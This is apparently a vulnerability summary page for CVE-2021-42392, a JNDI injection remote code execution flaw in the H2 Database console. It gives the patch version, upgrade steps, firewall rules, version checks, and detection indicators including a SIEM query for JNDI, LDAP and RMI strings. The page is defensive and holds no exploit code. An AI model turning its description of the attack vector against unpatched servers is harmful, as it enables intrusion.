CVE-2021-42392
📋 TL;DR
CVE-2021-42392 is a critical remote code execution vulnerability in H2 Database where attackers can exploit JNDI injection through the database driver configuration. This allows unauthenticated attackers to execute arbitrary code on systems running vulnerable H2 Database versions. Organizations using H2 Database, particularly with the H2 Console exposed, are affected.
💻 Affected Systems
- H2 Database
📦 What is this software?
Communications Cloud Native Core Policy by Oracle
View all CVEs affecting Communications Cloud Native Core Policy →
H2 by H2database
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise with attacker gaining full control over the database server and potentially pivoting to other systems in the network.
Likely Case
Remote code execution leading to data theft, ransomware deployment, or installation of persistent backdoors on vulnerable systems.
If Mitigated
Limited impact if proper network segmentation and access controls prevent exploitation attempts.
🎯 Exploit Status
Multiple public exploit scripts and detailed technical analysis are available. The vulnerability is actively exploited in the wild.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Version 2.0.204 or later
Vendor Advisory: https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6
Restart Required: Yes
Instructions:
1. Download H2 Database version 2.0.204 or later from official sources. 2. Stop all H2 Database services. 3. Replace the existing H2 JAR files with the patched version. 4. Restart H2 Database services. 5. Verify the version is updated.
🔧 Temporary Workarounds
Disable H2 Console
allCompletely disable the H2 Console if not required for operations
Remove or comment out H2 Console configuration in application properties/configuration files
Network Access Restrictions
linuxRestrict network access to H2 Database instances
iptables -A INPUT -p tcp --dport 8082 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 8082 -j DROP
🧯 If You Can't Patch
- Implement strict network segmentation to isolate H2 Database instances from untrusted networks
- Deploy web application firewall (WAF) rules to block JNDI/LDAP/RMI connection attempts
🔍 How to Verify
Check if Vulnerable:
Check H2 Database version: java -cp h2*.jar org.h2.tools.Server -? | grep versionCheck Version:
java -cp h2*.jar org.h2.tools.Server -? | grep versionVerify Fix Applied:
Verify version is 2.0.204 or higher using the same command and check that JNDI driver functionality is restricted📡 Detection & Monitoring
Log Indicators:
- JNDI or LDAP connection attempts in H2 logs
- Unexpected database driver loading
- Connection attempts with suspicious driver names
Network Indicators:
- Outbound LDAP/RMI connections from H2 Database server
- Connection attempts to H2 Console port (default 8082)
SIEM Query:
source="h2.log" AND ("JNDI" OR "LDAP" OR "RMI" OR "javax.naming")🔗 References
- https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6
- https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/
- https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html
- https://security.netapp.com/advisory/ntap-20220119-0001/
- https://www.debian.org/security/2022/dsa-5076
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://www.secpod.com/blog/log4shell-critical-remote-code-execution-vulnerability-in-h2database-console/
- https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6
- https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/
- https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html
- https://security.netapp.com/advisory/ntap-20220119-0001/
- https://www.debian.org/security/2022/dsa-5076
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://www.secpod.com/blog/log4shell-critical-remote-code-execution-vulnerability-in-h2database-console/
